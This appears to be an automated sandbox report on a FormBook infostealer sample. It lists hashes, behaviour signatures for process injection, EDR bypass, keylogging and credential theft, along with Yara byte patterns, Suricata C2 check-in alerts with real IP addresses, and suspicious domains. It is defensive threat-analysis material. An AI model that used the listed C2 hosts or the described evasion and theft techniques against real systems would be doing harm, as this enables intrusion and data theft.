Edit tour

Windows Analysis Report
OPEN BALANCE.exe

Overview

General Information

Sample name:	OPEN BALANCE.exe
Analysis ID:	1482866
MD5:	3c7e962b0a10cdb5cc5de42bc2e29d5d
SHA1:	97ba323d41b125a63f7351aec41a0831a6450fd1
SHA256:	b1ca66c8cc7404a8093a85dc99ba848d7b4b307e463dd930ec91c509e1e81df2
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found API chain indicative of sandbox detection

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

OPEN BALANCE.exe (PID: 1536 cmdline: "C:\Users\user\Desktop\OPEN BALANCE.exe" MD5: 3C7E962B0A10CDB5CC5DE42BC2E29D5D)

svchost.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\OPEN BALANCE.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

VnZdrTcLqvUA.exe (PID: 7140 cmdline: "C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

attrib.exe (PID: 3876 cmdline: "C:\Windows\SysWOW64\attrib.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)

VnZdrTcLqvUA.exe (PID: 6336 cmdline: "C:\Program Files (x86)\sMQvFCIpuVKheCCWkklQgFifQTZdvVtZruHXTKMPcQjwkCrgA\VnZdrTcLqvUA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b300:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b300:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b300:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e823:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17322:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x54b33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3d632:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b300:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x47ce08:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x465907:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x47ce08:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x465907:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2da23:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16522:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e823:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17322:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OPEN BALANCE.exe", CommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", ParentImage: C:\Users\user\Desktop\OPEN BALANCE.exe, ParentProcessId: 1536, ParentProcessName: OPEN BALANCE.exe, ProcessCommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", ProcessId: 4396, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\OPEN BALANCE.exe", CommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", ParentImage: C:\Users\user\Desktop\OPEN BALANCE.exe, ParentProcessId: 1536, ParentProcessName: OPEN BALANCE.exe, ProcessCommandLine: "C:\Users\user\Desktop\OPEN BALANCE.exe", ProcessId: 4396, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 47.238.77.168

Timestamp:	2024-07-26T09:41:48.859263+0200
SID:	2855464
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 38.181.21.136

Timestamp:	2024-07-26T09:41:34.500676+0200
SID:	2855464
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 84.32.84.65

Timestamp:	2024-07-26T09:41:23.205676+0200
SID:	2855464
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-26T09:41:59.707142+0200
SID:	2856318
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-26T09:42:04.916478+0200
SID:	2856318
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 38.181.21.136

Timestamp:	2024-07-26T09:41:37.119440+0200
SID:	2855464
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 47.238.77.168

Timestamp:	2024-07-26T09:41:46.214585+0200
SID:	2855464
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 199.59.243.226

Timestamp:	2024-07-26T09:42:21.016731+0200
SID:	2855465
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.244.179

Timestamp:	2024-07-26T09:42:49.175599+0200
SID:	2855464
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T09:40:46.731556+0200
SID:	2022930
Source Port:	443
Destination Port:	49712
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.59.243.226

Timestamp:	2024-07-26T09:42:13.232638+0200
SID:	2855464
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 38.181.21.136

Timestamp:	2024-07-26T09:41:39.781582+0200
SID:	2855465
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.5 - Destination IP: 84.32.84.65

Timestamp:	2024-07-26T09:41:17.900307+0200
SID:	2856318
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 65.181.134.177

Timestamp:	2024-07-26T09:42:33.405424+0200
SID:	2855464
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 38.181.21.136

Timestamp:	2024-07-26T09:41:32.251380+0200
SID:	2855464
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 84.32.84.65

Timestamp:	2024-07-26T09:41:20.597699+0200
SID:	2855464
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 65.181.134.177

Timestamp:	2024-07-26T09:42:28.250244+0200
SID:	2855464
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.59.243.226

Timestamp:	2024-07-26T09:42:15.875032+0200
SID:	2855464
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-26T09:42:02.343102+0200
SID:	2855464
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 65.181.134.177

Timestamp:	2024-07-26T09:42:43.250744+0200
SID:	2855465
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 84.32.84.65

Timestamp:	2024-07-26T09:41:25.817442+0200
SID:	2855465
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 40.127.169.103 - Destination IP: 192.168.2.5

Timestamp:	2024-07-26T09:40:08.362426+0200
SID:	2022930
Source Port:	443
Destination Port:	49704
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 47.238.77.168

Timestamp:	2024-07-26T09:41:54.129827+0200
SID:	2855465
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 3.33.244.179

Timestamp:	2024-07-26T09:42:57.260941+0200
SID:	2855465
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 65.181.134.177

Timestamp:	2024-07-26T09:42:30.827538+0200
SID:	2855464
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 199.59.243.226

Timestamp:	2024-07-26T09:42:18.437847+0200
SID:	2855464
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.244.179

Timestamp:	2024-07-26T09:42:51.732765+0200
SID:	2855464
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 47.238.77.168

Timestamp:	2024-07-26T09:41:51.714916+0200
SID:	2855464
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-07-26T09:42:07.486322+0200
SID:	2855465
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.5 - Destination IP: 192.236.177.190

Timestamp:	2024-07-26T09:40:57.090254+0200
SID:	2855465
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.5 - Destination IP: 3.33.244.179

Timestamp:	2024-07-26T09:42:54.328463+0200
SID:	2855464
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: OPEN BALANCE.exe	ReversingLabs: Detection: 47%
Source: OPEN BALANCE.exe	Virustotal: Detection: 33%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2470951114.00000000062C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918981184.0000000002CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3918918211.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469686151.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3918414894.0000000000630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3917936573.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3919198239.0000000002D60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2470241137.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: OPEN BALANCE.exe

Joe Sandbox ML: detected

Source: OPEN BALANCE.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: attrib.pdb source: svchost.exe, 00000002.00000002.2469853116.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438356365.000000000341A000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918728381.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000003.2408309589.000000000110B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VnZdrTcLqvUA.exe, 00000004.00000000.2392780580.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp, VnZdrTcLqvUA.exe, 00000008.00000000.2659886240.0000000000CBE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: OPEN BALANCE.exe, 00000000.00000003.2054402691.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OPEN BALANCE.exe, 00000000.00000003.2055222342.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244011021.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2255328825.0000000003800000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2470619254.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.000000000309E000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2478806719.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: OPEN BALANCE.exe, 00000000.00000003.2054402691.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OPEN BALANCE.exe, 00000000.00000003.2055222342.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2244011021.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2469948379.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2255328825.0000000003800000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, attrib.exe, 00000005.00000002.3919244777.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2470619254.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, attrib.exe, 00000005.00000002.3919244777.000000000309E000.00000040.00001000.00020000.00000000.sdmp, attrib.exe, 00000005.00000003.2478806719.0000000002D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: attrib.pdbGCTL source: svchost.exe, 00000002.00000002.2469853116.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438356365.000000000341A000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000002.3918728381.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000004.00000003.2408309589.000000000110B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: attrib.exe, 00000005.00000002.3919772809.000000000352C000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.0000000002900000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000025BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.000000003927C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: attrib.exe, 00000005.00000002.3919772809.000000000352C000.00000004.10000000.00040000.00000000.sdmp, attrib.exe, 00000005.00000002.3918152730.0000000002900000.00000004.00000020.00020000.00000000.sdmp, VnZdrTcLqvUA.exe, 00000008.00000002.3919567973.00000000025BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2913264795.000000003927C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_008ADBBE
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_0087C2A2 FindFirstFileExW,	0_2_0087C2A2
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B68EE FindFirstFileW,FindClose,	0_2_008B68EE
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_008B698F
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008AD076
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_008AD3A9
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008B9642
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_008B979D
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_008B9B2B
Source: C:\Users\user\Desktop\OPEN BALANCE.exe	Code function: 0_2_008B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_008B5C97
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 5_2_0256BDC0 FindFirstFileW,FindNextFileW,FindClose,	5_2_0256BDC0

Source: C:\Windows\SysWOW64\attrib.exe	Code function: 4x nop then xor eax, eax	5_2_02559B10
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 4x nop then pop edi	5_2_0255DA3C
Source: C:\Windows\SysWOW64\attrib.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_02DD04DE

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.worldheadline.xyz
Source:	DNS query: www.counseloratlaw1806.xyz

Source: Joe Sandbox View

IP Address: 199.59.243.226 199.59.243.226

Source: Joe Sandbox View

ASN Name: HOSTWINDSUS HOSTWINDSUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\OPEN BALANCE.exe

Code function: 0_2_008BCE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_008BCE44

